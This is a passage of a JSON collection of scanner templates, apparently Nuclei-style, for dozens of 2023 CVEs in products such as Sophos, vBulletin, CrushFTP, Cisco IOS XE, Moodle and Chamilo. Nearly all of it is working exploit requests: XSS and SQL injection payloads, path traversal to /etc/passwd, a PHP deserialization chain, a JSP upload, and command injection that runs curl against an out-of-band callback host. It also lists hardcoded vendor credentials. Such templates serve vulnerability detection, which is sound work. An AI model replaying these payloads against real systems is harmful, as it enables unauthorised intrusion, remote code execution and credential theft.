Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34020","info":{"name":"Uncanny Toolkit for LearnDash - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-6568","info":{"name":"Mlflow - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/2.0/mlflow/users/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: <script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid content type:"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-36306","info":{"name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"><script>alert(document.domain)</script>\") && contains(body, \"Adiscon LogAnalyzer\")"],"condition":"and"}]}]},{"id":"CVE-2023-40748","info":{"name":"PHPJabbers Food Delivery Script - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["class <strong>pjAdminOrdersaction","didn't exists"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30943","info":{"name":"Moodle - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"raw":["GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /login/index.php HTTP/2\nHost: {{Hostname}}\n","POST /login/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n","GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(document.domain)>",">archive","File icon"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","part":"header_4","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-6275","info":{"name":"TOTVS Fluig Platform - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","fluig://"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-43177","info":{"name":"CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebInterface"],"matchers":[{"type":"dsl","internal":true,"dsl":["contains_all(to_lower(header), \"currentauth\", \"crushauth\")"]}]},{"method":"POST","path":["{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"],"headers":{"Cookie":"CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}","as2-to":"X","user_name":"crushadmin{{dirname}}","user_log_path":"./WebInterface/{{dirname}}/","user_log_file":"{{filename}}","Content-Type":"application/x-www-form-urlencoded"},"body":"post=body\n","matchers":[{"type":"regex","regex":["crushadmin"]}]},{"method":"GET","path":["{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"crushadmin{{dirname}}\")"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-6380","info":{"name":"OpenCms 14 & 15 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-45375","info":{"name":"PrestaShop PireosPay - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/modules/pireospay/\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20\nPOST /module/pireospay/validation HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\najax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-42442","info":{"name":"JumpServer > 3.6.4 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/terminal/sessions/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"terminal\":","\"user_id\":\"","\"account_id\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-47253","info":{"name":"Qualitor <= 8.20 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Windows\",\"DNS\")","contains(content_type,\"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35161","info":{"name":"XWiki >= 6.2-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","DeleteApplication","data-xwiki"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6021","info":{"name":"Ray API - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nodes?view=summary","{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["root:.*:0:0:"]},{"type":"word","part":"header_2","words":["text/plain","aiohttp"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"nodeid","json":["..|objects|.nodeId//empty[0]"]}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-35156","info":{"name":"XWiki >= 6.0-rc-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cancel\" href=\"javascript:alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<img src=x onerror=alert(document.domain);>\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["<IMG SRC=/ onerror=\"alert(document.domain)\"></img>","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<title>Index of /fp-content</title>\")"],"condition":"and"}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-45855","info":{"name":"qdPM 9.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uploads/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /uploads</title>","attachments/</a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\"?> <SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <SOAP:Header> <wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\"> <wsse:UsernameToken SOAP:mustUnderstand=\"false\"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\"> <execCLI xsd=\"false\"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","<text>","<received>"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["<text>\\n(.*)\\["]}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-40750","info":{"name":"PHPJabbers Yacht Listing Script v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40208","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["stock_ticker","onmousemove=alert(document.domain)"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<script>alert(/document.domain/)</script>\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41538","info":{"name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"New Question\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-40755","info":{"name":"PHPJabbers Callback Widget v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["PHPJabbers"],"case-insensitive":true,"internal":true}]},{"method":"GET","path":["{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["theme=theme10dnel8\"><script>alert(document.domain)</script>ko0"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{BaseURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n  <SOAP-ENV:Body>\n    <ns1:wsConvertPpt>\n      <param0 xsi:type=\"ns2:Map\">\n        <item>\n          <key xsi:type=\"xsd:string\">file_data</key>\n          <value xsi:type=\"xsd:string\"></value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">file_name</key>\n          <value xsi:type=\"xsd:string\">$(curl http://{{interactsh-url}}/)</value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">service_ppt2lp_size</key>\n          <value xsi:type=\"xsd:string\">720x540</value>\n        </item>\n      </param0>\n    </ns1:wsConvertPpt>\n  </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command 